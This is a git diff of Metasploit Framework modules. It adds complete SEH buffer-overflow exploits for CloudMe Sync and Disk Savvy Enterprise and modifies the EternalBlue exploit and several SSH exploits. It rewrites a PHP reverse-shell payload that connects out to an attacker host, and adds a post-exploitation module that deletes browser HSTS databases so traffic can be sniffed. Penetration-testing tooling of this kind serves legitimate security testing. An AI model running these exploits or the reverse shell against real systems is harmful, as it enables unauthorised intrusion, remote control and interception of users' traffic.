a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 0cf2138f9e..4fe890b696 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote return false unless ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil conn end diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index bff7067f67..5fb276c2ba 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3c4ef23169..0d8a939067 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 48714417a1..d2c4f96ea6 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true) + conn = Net::SSH::CommandStream.new(ssh, 'shell-escape') return conn end diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 6f812d10fb..b48a856c9b 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb index 84d547712a..4094cb72a6 100644 --- a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb +++ b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote private: private_key, private_type: :ssh_key ) - return Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + return Net::SSH::CommandStream.new(ssh) end nil diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a914837815..6a688756a5 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) self.sockets.delete(ssh_socket.transport.socket) return conn diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 4ee91ab322..778902cb34 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -186,6 +186,6 @@ class MetasploitModule < Msf::Exploit::Remote # Make the SSH connection and execute our commands + payload print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!") - Net::SSH::CommandStream.new(ssh, build_command, true) + Net::SSH::CommandStream.new(ssh, build_command) end end diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 53a0a22034..85064b1092 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote message = transport.next_message.type if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT - shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true) + shell = Net::SSH::CommandStream.new(connection) connection = nil return shell end diff --git a/modules/exploits/windows/misc/cloudme_sync.rb b/modules/exploits/windows/misc/cloudme_sync.rb new file mode 100644 index 0000000000..5d6d885004 --- /dev/null +++ b/modules/exploits/windows/misc/cloudme_sync.rb @@ -0,0 +1,67 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CloudMe Sync v1.10.9', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in CloudMe Sync v1.10.9 client application. This module has been + tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hyp3rlinx', # Original exploit author + 'Daniel Teixeira' # MSF module author + ], + 'References' => + [ + [ 'CVE', '2018-6892'], + [ 'EDB', '44027' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ 'CloudMe Sync v1.10.9', + { + 'Offset' => 2232, + 'Ret' => 0x61e7b7f6 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 17 2018', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(8888)]) + + end + + def exploit + connect + + buffer = make_nops(target['Offset']) + buffer << generate_seh_record(target.ret) + buffer << payload.encoded + + sock.put(buffer) + handler + end +end diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb new file mode 100644 index 0000000000..de4da979a3 --- /dev/null +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -0,0 +1,77 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Savvy Enterprise v10.4.18', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module + has been tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniel Teixeira' + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x02\x0a\x0d\xf8", + 'Space' => 800 + }, + 'Targets' => + [ + [ 'Disk Savvy Enterprise v10.4.18', + { + 'Offset' => 124, + 'Ret' => 0x10056d13 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(9124)]) + + end + + def exploit + seh = generate_seh_record(target.ret) + connect + + buffer = make_nops(target['Offset']) + buffer << seh + buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh + buffer << "\x83\xc4\x21" #ADD esp,21h + buffer << "\xff\xe4" #JMP esp + buffer << payload.encoded + buffer << Rex::Text.rand_text_alphanumeric(1) + + header = "\x75\x19\xba\xab" + header << "\x03\x00\x00\x00" + header << "\x00\x40\x00\x00" + header << [buffer.length].pack("V") + header << [buffer.length].pack("V") + header << [buffer[-1].ord].pack("V") + packet = header + packet << buffer + + sock.put(packet) + handler + end +end diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 34582476a6..022cfe0a6f 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', + 'EXITFUNC' => 'thread', + 'WfsDelay' => 5, }, 'Privileged' => true, 'Payload' => @@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote # we don't need this sleep, and need to find a way to remove it # problem is session_count won't increment until stage is complete :\ secs = 0 - while !session_created? and secs < 5 + while !session_created? and secs < 30 secs += 1 sleep 1 end @@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote rescue EternalBlueError => e print_error("#{e.message}") + return false + rescue ::RubySMB::Error::NegotiationFailure + print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.") + return false rescue ::RubySMB::Error::UnexpectedStatusCode, ::Errno::ECONNRESET, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, - ::Rex::ConnectionRefused => e + ::Rex::ConnectionRefused, + ::RubySMB::Error::CommunicationError => e print_error("#{e.class}: #{e.message}") + report_failure + return false rescue => error print_error(error.class.to_s) print_error(error.message) print_error(error.backtrace.join("\n")) + return false ensure # pass end @@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote end end + ''' # # Increase the default delay by five seconds since some kernel-mode # payloads may not run immediately. @@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay super + 5 end - + ''' def smb2_grooms(grooms, payload_hdr_pkt) grooms.times do |groom_id| @@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Sending malformed Trans2 packets") sock.put(trans2_pkt_nulled) - sock.get_once + begin + sock.get_once + rescue EOFError + vprint_error("No response back from SMB echo request. Continuing anyway...") + end client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00") end diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index d4740e5e39..bd65a0861e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 132 + CachedSize = 253 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions @@ -49,6 +49,6 @@ module MetasploitModule lhost = datastore['LHOST'] ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&" + cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&" end end diff --git a/modules/post/multi/manage/hsts_eraser.rb b/modules/post/multi/manage/hsts_eraser.rb new file mode 100644 index 0000000000..8d336bf96b --- /dev/null +++ b/modules/post/multi/manage/hsts_eraser.rb @@ -0,0 +1,130 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::UserProfiles + include Msf::Post::OSX::System + include Msf::Post::Unix + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Web browsers HSTS entries eraser', + 'Description' => %q{ + This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox, + Google Chrome, Opera, Safari and wget. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths + ], + 'Platform' => %w(linux osx unix win), + 'Arch' => [ARCH_X86,ARCH_X64], + 'References' => + [ + [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ], + [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ] + ], + 'SessionTypes' => %w(meterpreter shell) + )) + + register_options([ + OptBool.new('DISCLAIMER', + [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false]) + ]) + end + + def run + unless (datastore['DISCLAIMER'] == true) + print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.") + return + end + + profiles = user_profiles + + profiles.each do |user_profile| + account = user_profile['UserName'] + browsers_hsts_db_path = {} + + case session.platform + when 'windows' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity", + 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity" + } + when 'unix', 'linux' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity", + 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity", + 'wget' => "#{user_profile['LocalAppData']}/.wget-hsts" + } + when 'osx' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity", + 'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity", + 'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist" + } + else + print_error "Platform not recognized: #{session.platform}" + end + + browsers_hsts_db_path.each_pair do |browser, path| + if browser == 'Firefox' + hsts_db_path = [] + if directory?(path) + files = dir(path) + files.reject! { |file| %w(. ..).include?(file) } + files.each do |file_path| + hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/) + end + end + path = hsts_db_path[0] + end + if !path.nil? and file?(path) + print_status "Removing #{browser} HSTS database for #{account}... " + file_rm(path) + end + end + end + + print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)" + + end + + def user_profiles + user_profiles = [] + case session.platform + when /unix|linux/ + user_names = dir("/home") + user_names.reject! { |u| %w(. ..).include?(u) } + user_names.each do |user_name| + user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") + end + when /osx/ + user_names = session.shell_command("ls /Users").split + user_names.reject! { |u| u == 'Shared' } + user_names.each do |user_name| + user_profiles.push( + 'UserName' => user_name, + "AppData" => "/Users/#{user_name}/Library", + "LocalAppData" => "/Users/#{user_name}/Library/Application Support" + ) + end + when /windows/ + user_profiles |= grab_user_profiles + else + print_error "Error getting user profile data!" + end + user_profiles + end + + def system_separator + return session.platform == 'windows' ? '\\' : '/' + end +end diff --git a/plugins/wmap.rb b/plugins/wmap.rb index 6039d7a159..9016171098 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -140,11 +140,11 @@ class Plugin::Wmap < Msf::Plugin end when '-d' del_idx = args - if del_idx + if !del_idx.empty? delete_sites(del_idx.select {|d| d =~ /^[0-9]*$/}.map(&:to_i).uniq) return else - print_error("Provide index of site to delete") + print_error("No index provided.") end when '-l' view_sites diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 8cf970240b..ae0e104270 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1971,6 +1971,28 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'osx/x64/exec' end + context 'osx/x64/meterpreter/bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/bind_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/bind_tcp' + end + + context 'osx/x64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/reverse_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/reverse_tcp' + end + context 'osx/x64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [